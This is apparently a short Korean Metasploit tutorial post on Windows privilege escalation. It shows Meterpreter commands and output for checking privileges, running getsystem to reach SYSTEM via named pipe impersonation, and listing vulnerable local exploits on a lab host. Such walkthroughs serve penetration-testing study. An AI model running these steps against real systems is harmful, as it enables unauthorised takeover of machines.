[MAD-METASPLOIT] 0x32 - Privilige Escalation

by hahwul 1 min read

win_privs를 통한 권한 확인

post/windows/gather/win_privs

meterpreter > run post/windows/gather/win_privs

Current User

Is Admin Is System Is In Local Admin Group UAC Enabled Foreground ID UID ——– ——— ———————– ———– ————- — False False True False 1 “HAHWUL\Test-Virtualbox”

Windows Privileges

Name —- SeChangeNotifyPrivilege

getsystem을 통해 자동 권한상승

meterpreter > getsystem -h Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

-h        Help Banner.
-t <opt>  The technique to use. (Default to '0'). 0 : All techniques available 1 : Named Pipe Impersonation (In Memory/Admin) 2 : Named Pipe Impersonation (Dropper/Admin) 3 : Token Duplication (In Memory/Admin)

meterpreter > getsystem

…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

local_exploit_suggester를 이용하여 local exploit 찾기

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 192.168.56.101 - Collecting local exploits for x86/windows…

[*] 192.168.56.101 - 37 exploit checks are being tried…

[+] 192.168.56.101 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.

[+] 192.168.56.101 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.

[+] 192.168.56.101 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.

[+] 192.168.56.101 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.

[+] 192.168.56.101 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.

[+] 192.168.56.101 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.

[+] 192.168.56.101 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.

[+] 192.168.56.101 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.

[+] 192.168.56.101 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.

[+] 192.168.56.101 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.